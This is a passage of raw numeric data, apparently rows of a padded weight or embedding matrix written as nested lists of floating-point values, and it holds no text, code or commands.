-1.28383, -0.249607, -0.0075578, 0.39953, -0.37575, 0.0447787, 0.388338, -0.100521, 0.102345, 0.0029532, -0.549472, -0.752051, -0.37313, -0.559753, -0.318941, 0.410923, -0.130395, 0.084063, 0.0427115, -0.584379, -0.0703741, -0.0222336, -4.07926, 0.543313, -0.137664, -0.0977158, 0.0545818, -0.69009, -0.687778, -0.278227, 1.37338, -0.405542, -0.684779, -0.701456, 0.215251, -5.73866, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.132456, 0.00653876, -0.181868, -0.183501, -0.00734338, 0.0619047, -0.0765973, 0.00871613, -0.234703, -0.148696, -0.145103, 0.0312273, 0.156604, -0.139479, -0.223985, -1.78745, -0.00854403, 0.139837, -0.0216704, 0.209051, -0.841269, 0.219841, 0.635227, -0.333204, -0.871749, -0.13184, 0.476012, -0.0629323, -0.149281, 0.265442, 0.0686733, -0.145368, -0.33982, 0.710938, -0.0698718, 0.09569, -0.705132, -0.0314178, 0.376186, -0.63012, -0.696653, 0.237764, -0.149178, -0.404871, 0.0334336, 0.159359, -0.296805, -0.0407553, -0.182082, 0.049459, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.287861, -0.04678, -0.131263, -0.12598, 0.352121, -1.78031, 0.132815, 0.0757144, -0.0120471, 0.164915, -0.0962221, 0.120225, -0.299619, -0.167812, 0.34793, 0.474671, -0.11004, 0.103, -0.184718, 0.204637, -0.463464, 0.0531635, 1.32197, -0.55262, 0.2249, 0.0571285, 0.564801, -0.311099, -0.0185846, 0.202923, -0.117074, 0.047368, -0.404744, 0.082472, -0.209469, -0.0878709, 0.143208, 0.123766, -0.434521, -0.148712, 0.0145178, -0.094604, -0.151499, -0.166134, -0.125543, 0.107524, -0.279476, 0.011276, 0.726611, -0.22419, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.142316, -0.814182, -0.404283, -0.370149, -0.452066, -0.901288, 0.880075, 0.784151, -0.20709, 0.392822, 0.0489599, -0.167056, -3.95979, 0.897697, -0.442115, 0.894111, -0.482519, -0.00375501, 0.346389, -0.0680937, 1.04478, 0.470621, 2.48437, 0.0975758, -1.0105, -0.279931, -2.11522, -0.214022, -0.427502, 0.105757, -0.770574, -0.506058, -0.0277444, 1.21886, -0.29669, 0.108917, 1.75246, -1.19457, 1.0252, -0.409398, -1.01635, -0.386192, -0.221114, -0.478359, 0.00294559, -0.622343, 0.178666, -1.92764, 0.367933, 0.602168, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.103594, -0.0720398, 0.0895735, -0.0543464, 0.091376, -0.100477, 0.58757, 0.242598, -0.271357, 0.131336, -0.0333531, -0.0566682, -0.0900692, 0.100644, -0.117363, -0.0479596, -0.00116666, 0.22435, -0.131118, 0.0707844, 0.111993, -0.0570742, 0.422555, -0.350214, 1.15807, 0.000290742, 0.0681186, 0.0138534, -0.113952, 0.0282196, -0.110515, -0.11541, -0.0222953, 0.282697, -0.130744, 0.00399042, 0.312493, 0.074786, -0.333212, -0.154554, -0.0424785, -0.120969, -0.05402, 0.183557, 0.0407818, -0.0212924, 0.015126, 0.0421608, 0.467899, 0.118486, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.500879, 0.12594, -1.18311, 0.0502378, 0.0665553, -0.1658, 0.91683, -0.139208, -0.0406133, 0.00956346, 0.00174168, 0.00196598, 0.139596, -0.587051, -0.170849, 0.474565, 0.208667, 0.333218, -0.408373, 0.0925186, -1.50999, -0.194154, 0.135374, -0.379178, 0.402895, 0.216421, 0.0785686, 0.0227739, -0.429809, -0.688562, -1.59372, 0.153006, 0.164011, 0.251045, 0.575912, -3.77942, -2.54885, -0.147509, 0.375189, -0.326011, -4.10714, -0.223976, -0.0468489, -0.192346, -0.470653, 0.115621, 0.498, 0.224584, 0.596895, 0.0949333, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.811437, 0.0781903, 0.140518, -0.360265, 0.435942, -0.288602, 0.439813, 0.559768, -0.680948, 0.433477, -0.13786, 0.150993, -0.0731128, 0.341544, -0.0102996, 0.525753, -0.0703896, 0.44283, -0.271071, 0.242988, 0.48054, 0.0188956, 0.976336, -0.481304, 0.721347, 0.237572, 0.079239, -0.00983028, 0.634466, -0.360142, -0.0148708, -0.0259735, -0.840557, -0.0793181, 0.349883, -0.279715, 0.607073, 0.0322783, -0.439898, -0.291687, 0.133832, 0.202222, -0.213299, 0.0957336, 0.258435, -0.0601844, -0.0882932, 0.103154, -0.35955, -0.154226, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0226423, -0.0403901, -0.37341, -0.0161318, -0.119926, 0.0166715, -0.0334573, -0.0714379, -0.0709907, 0.066594, -0.0999774, -0.026993, 0.0372968, 0.0910531, 0.0363538, 0.0226704, 0.0222955, -0.455384, -0.08335, 0.0344807, -0.107881, 0.0709869, 0.434145, -0.0505261, 0.140649, 0.0476212, -0.117637, 0.0264511, -0.00532024, 0.0359947, 0.00956628, -0.145871, -0.100824, -0.40898, -0.0556731, -0.0570016, 0.0504602, -0.201963, -0.00698904, -0.0341373, 0.0380687, -0.00819762, -0.143825, -0.0494305, -0.0500266, -0.0331957, -0.0191597, -0.0459413, 0.0103464, -0.0302646, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00688077, 0.0804454, -0.33695, -0.0331931, 0.149177, 0.0947901, 0.440679, 0.499239, 0.00456278, 0.165679, -0.041222, 0.0117932, 0.0393663, -0.380001, -0.184088, 0.0212821, 0.0110821, 0.0069298, -0.419095, 0.250814, 0.136258, 0.0627071, -1.212, -0.200348, -1.366, -0.0700765, 0.0417565, -0.0704483, 0.0436412, -0.47107, -0.0172251, 0.0364049, 0.0311798, -0.0253562, -0.0838757, 0.126007, 0.821687, 0.0160065, 0.0717867, 0.0102948, -0.0256147, 0.0230969, -0.587062, 0.0047344, -1.48287, -0.035231, -0.0316535, -0.236771, 0.463297, -0.129401, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0323419, -0.00254679, 0.0283329, -0.00855935, -0.0587841, 0.0318594, -0.189143, -0.0565033, -0.0535691, -0.132939, -0.00899322, -0.0186099, 0.0381308, -0.0215097, 0.0082873, -0.369815, 0.00662978, -0.00076462, 0.0209193, 0.224671, -0.0632537, -0.0770323, -0.0370791, -0.0126841, -0.866457, -0.034074, -0.0487444, -0.0308159, -0.0737665, -0.0174025, -0.00541497, -0.060926, -0.0225717, 0.00816967, -0.107796, 0.00372207, -0.0889563, 0.0705589, 0.0584881, -0.060894, 0.0120495, -0.000304194, -0.165264, 0.0074629, 0.022807, 0.00480721, -0.0200801, 0.0193073, -0.263136, -0.138452, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.111732, -0.0781251, -0.214599, -0.0209763, 0.362982, 0.143494, -0.0326712, 0.0133072, 0.0909087, -0.2518, -0.0899895, -0.0310441, -0.0898561, 0.0972571, -0.145931, -0.104287, -0.0031406, -0.0766311, -0.0425387, 0.0963478, 0.0957888, 0.00505831, 0.0108931, 0.0871814, 1.21998, -0.10286, 0.0382685, -0.037453, -0.0434237, -0.0064542, -0.00800121, 0.0258678, 0.134227, 0.171988, 0.0120545, 0.0613828, -0.151482, -0.000563613, -0.13341, -0.148155, -0.133182, 0.00524983, -0.0645679, -0.0357779, -0.043702, -0.0269263, 0.00528176, 0.0780104, 0.18348, -0.0884357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.560494, -0.117902, 0.17185, -0.0417377, -0.826381, -0.310646, -0.183176, 0.328201, -0.695226, 0.189864, -0.0112712, -0.153695, -1.05673, 0.335735, 0.446317, -0.647578, -0.0299569, 0.749332, -0.146918, 0.307679, 0.223544, -0.0857113, -0.387297, -0.355934, -0.483143, -0.143031, 0.511502, 0.185676, 0.328072, -0.406083, -0.0940334, 0.0132465, -0.404758, -0.164591, -0.0321921, -0.0525297, 0.28854, 0.207286, -0.345591, 0.0863312, -0.106712, 0.394282, -0.325867, -0.247916, 0.0395227, -0.203009, -0.387025, -0.1184, -0.450579, 0.0927852, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0440856, -0.042445, -0.00868048, -0.0397613, 0.117645, 0.0464773, -0.193045, 0.0963659, 0.00377966, -0.12202, 0.00777864, -0.0353338, 0.112155, -0.0689182, 0.0859579, -0.144996, -0.0085225, 0.109677, 0.00578479, -0.0317219, -0.113144, 0.0667557, 0.273963, -8.47092, 3.49789, 0.0406811, 0.330094, -0.0625371, 0.0105375, -0.102529, -0.0205035, -0.157469, -0.0445341, 0.497417, -0.170305, -0.0472577, -0.0151772, -0.0994383, 0.0411071, -0.0549893, 0.0135095, -0.194767, 0.0765783, 0.00794592, 0.0237727, 0.00579351, 0.0035029, -0.258331, -0.351223, 0.141937, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00306404, -0.00597055, 0.00479094, -0.0227752, 0.0128366, 0.00805428, 0.0452696, -0.022526, -0.00208623, -0.0880903, 0.00204299, -0.0141808, -0.045913, 0.0255467, 0.00680807, 0.039204, 0.00332514, 0.0112871, -0.00610723, 0.147932, -0.108795, -0.0120731, 0.111981, 0.0382372, -0.572532, 0.00604884, 0.0103635, 0.000270331, -0.0377498, 0.279641, -0.0152733, -0.0839553, -0.0177529, 0.0255773, -0.0602036, -0.00746006, 0.0336583, -0.019963, 0.125001, -0.0654248, 0.00554361, -0.0202701, -0.00931843, 0.0287518, 0.0216567, -0.0171254, -0.00329204, -0.00997999, 0.0968163, 0.0200358, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.112293, 0.0163886, -0.0390981, 0.01642, 0.0264599, -1.62405, 0.0785744, -0.0401092, -0.0348185, -4.97828, 0.00546404, -0.0535893, 0.233624, -0.0114232, 0.0806789, 0.103856, 0.0180131, 0.0448099, -0.0781089, 0.0111943, -0.156512, -0.0182424, 0.244217, -0.226194, -0.143322, -0.0541756, -0.304976, -0.0166888, 0.019634, -0.328977, -0.0772441, 0.0744289, 0.0491654, 0.139232, 0.0508703, 0.0178523, 0.125444, 0.088567, -0.0732395, 0.0368907, -0.10324, 0.036446, -0.031756, -0.301978, -0.10069, -0.0620842, -0.0544417, -0.0373222, -0.275444, 0.0309976, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.446644, 0.379774, -1.01724, -0.0959338, -0.531742, 1.81963, 1.72627, -0.322446, -3.00188, -1.58764, -1.07026, 0.244105, -0.556621, -0.947218, 0.123711, 2.34873, -0.681039, 2.28748, 0.421013, -0.30058, 0.098931, -0.693342, 2.82743, -7.1045, -1.95233, 0.135614, -1.6552, -0.0512376, -0.13352, 1.07229, 0.538696, 1.47056, -0.43512, 0.747478, 0.740698, -0.780711, 0.562946, 0.239888, 1.49638, -0.514927, -1.26772, -1.34674, 0.705867, 0.180272, 0.0744998, 0.292226, -0.0948614, -2.40286, 1.9006, 0.240532, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00875356, -0.0128067, 0.0106013, -0.0131399, 0.0610931, -0.0370205, -0.391988, -0.133579, 0.00800814, -0.0552162, -0.00638398, -0.0143548, 0.102382, 0.00580936, -0.028979, 0.148967, 1.39886e-06, -0.0262818, 0.0163246, 0.148051, -0.0226706, -0.00522144, 0.0260445, -0.235949, 0.160104, 0.0211034, 0.526746, -0.104432, -0.0314343, -0.0603073, -0.00809905, 0.0518068, -0.0020968, -0.139523, -0.0467036, -0.0589226, 0.0812326, -0.0770843, -0.102515, -0.0517753, 0.0166431, 0.0408693, -0.0279587, -0.0870778, -0.00443328, -0.0285805, -0.00727501, 0.0423453, 0.158979, 0.0257194, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0362062, -0.00577689, -0.0103657, -0.024757, -0.221979, -0.298263, -0.0037196, 0.100136, -0.0568482, -0.0673329, -0.00247701, 0.0356846, 0.0934723, 0.025239, -0.0761367, 0.394647, 0.00696096, -0.0343712, 0.0284359, 0.198099, 0.0574449, -0.0249449, 0.232673, -0.062573, -0.491593, -0.0832537, 0.127585, 0.0386582, -0.0529601, -0.0360893, -0.0384961, -0.0432024, 0.050301, 0.0381752, -0.0954501, -0.00846791, 0.240627, 0.0533661, 0.0170262, -0.167452, 0.0129177, -0.088094, 0.0177517, 0.149116, 0.0673526, -0.0561872, -0.0391784, 0.0232981, -0.227678, -0.119072, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.334949, -0.113963, -0.27902, -0.387269, 0.404607, -1.18775, 0.0608408, -0.0178111, -0.0621192, 0.600203, 0.106009, 0.0160685, 0.0407689, 0.304786, -0.0433189, -0.292212, -0.254727, 0.160342, -0.211804, 0.454633, 0.105635, 0.141549, -0.328941, -0.473526, 0.0312564, 0.0549253, 0.0567239, -0.140981, -0.062938, 0.314318, -0.0986961, 0.0319032, -0.100114, 0.148075, 0.215585, 0.183788, -1.52681, 0.0806708, -0.160689, -0.399102, -1.89438, 0.290913, -0.165173, -0.197031, -0.497877, -0.424634, -0.0345733, 0.109606, 0.636899, -0.132753, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0985139, -0.0703067, -0.23311, -0.0523105, 0.670557, 0.114279, -0.513058, 0.126474, 0.0837282, 0.160597, -0.0384077, -0.0477434, 0.242995, 0.0954019, -0.516875, 0.346, 0.0963251, -0.301582, -0.702519, 0.138647, -0.156144, 0.0672541, 0.855116, -0.160343, 0.600517, -0.330355, -0.233081, -0.254728, -0.168828, 0.878081, 0.0320869, -0.021294, 0.388049, -0.0368169, -0.135228, 0.181527, -1.05246, -0.209474, -0.3675, -0.345513, -0.155005, -0.187558, 0.0272106, 0.13824, 0.191114, -0.0125833, -0.00179572, 0.234469, 0.257846, -0.0554235, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.09411, -0.0731537, -0.0711165, -0.00477624, -0.0769465, -0.127319, 0.221147, 0.142496, -0.0293818, -0.332621, -0.0248784, -0.0715314, -0.137483, -0.00141073, -0.111904, -0.174279, 0.0214567, -0.0840158, 0.0410639, 0.0877665, -0.0226189, -0.0964764, -0.025659, 0.12979, -0.17074, -0.103344, 0.065069, -0.0481136, -0.0126777, 0.152007, -0.067303, 0.161168, -0.0537225, 0.0325743, 0.0169831, -0.0445326, 0.108027, 0.0273002, -0.139223, -0.0806787, 0.0870772, 0.0507769, -0.00985393, -0.0717624, 0.0820608, 0.0236482, -0.03004, 0.147908, 0.115562, -0.233878, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0197342, -1.96928, -2.35527, -2.00168, 0.0154415, -0.0599972, -0.201645, -0.289215, 0.0342994, 0.00995885, -0.014354, 0.0170084, -2.28702, -2.74398, 0.0933968, -0.0452534, -0.00721437, 0.0763634, 0.0449166, -0.120002, -0.0205543, 0.184011, -0.0860477, 0.0728849, 0.0044849, 0.0296311, -0.255632, -0.00462001, -0.0344229, 0.26101, -0.00659369, 0.43885, 0.0898151, -1.5187, -0.221728, -0.168991, 0.678921, -0.00453472, -0.136658, 0.0482174, -0.0128041, -0.00967239, -0.00223001, 0.12543, -0.30073, -0.0456717, 0.0130896, -0.292643, -3.57599, 0.0658677, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.19637, -0.0588428, 0.0535369, -0.0799655, 0.227789, -0.251395, -0.522333, 0.387117, 0.179289, -0.236353, 0.00252838, 0.0119426, 0.0127738, 0.0718681, -0.00617394, 0.335547, -0.0536061, -0.00162807, -0.086083, -0.0812915, -0.0464828, -0.107206, -2.37276, -0.0584536, 0.898445, -0.139671, 0.175206, -0.0130803, 0.0266208, -0.00200233, -0.0279031, -0.142046, -0.0784671, 0.345688, -0.18122, -0.0998379, 0.459488, 0.357805, -0.329936, -0.115887, 0.118929, 0.0104661, -0.231251, 0.357821, 0.0520054, -0.160559, -0.127702, -0.131561, -0.57204, 0.160192, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0408095, -0.0164948, -0.0921487, -0.0381883, 0.188946, 0.0135917, -0.0238149, 0.0362086, -0.0464403, -0.254056, -0.0401621, 0.000949567, -0.115589, 0.10198, -0.0183313, -0.0593024, 0.00797729, 0.122431, 0.0273401, 0.194001, -0.12759, 0.0118569, -0.0541413, 0.088977, 0.815344, -0.0539617, -0.0469992, -0.115166, -0.041914, 0.0993239, -0.0375645, 0.0335681, -0.0442206, 0.00571638, -0.0987009, -0.00685568, -0.0193914, 0.0665324, -0.0155878, -0.0883539, 0.0233174, 0.0159587, -0.060935, -0.0164295, 0.0836622, -0.0138455, -0.0110137, 0.092802, 0.268128, -0.207024, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.107366, 0.000604712, -0.0998088, 0.0727791, -0.0475615, 0.0383725, -0.0688761, -0.0540376, -0.0685794, -0.135154, -0.0375732, 0.00741912, 0.0336323, -0.050909, -0.0286334, -1.12597, -0.0436479, 0.0219768, 0.148643, 0.296541, 0.259102, 0.0210393, -0.455901, 0.0317611, -0.411202, 0.0651753, 0.00491176, 0.0399848, -0.0974066, -0.0601347, 0.0263574, 0.0690879, 0.0526853, 0.221083, 0.0721333, -0.00310101, -0.477794, -0.0969671, -0.325002, -0.0280727, -0.0712338, -0.0430813, -0.0603186, 0.0507441, 0.0187806, 0.0190483, -0.146146, -0.0357812, 0.220854, -0.0862724, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0258, -0.2314, 0.003572, -0.1602, 0.4558, 0.00866, -0.1444, 0.2817, -0.175, 0.1099, -0.03793, -0.1318, -0.296, 0.1952, 0.1398, -0.00729, -0.1414, 0.3943, -0.1581, 0.0502, 0.0328, 0.1054, 0.7964, -0.2617, 1.558, 0.1525, 0.0258, -0.1304, -0.0794, -0.136, -0.07874, -0.1598, 0.1606, 0.7007, -0.5, -0.1288, 0.010284, -0.1263, -0.1797, -0.1915, 0.097, -0.07623, 0.2556, -0.2832, 0.1715, 0.284, -0.1881, 0.3103, -0.819, 0.3213], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 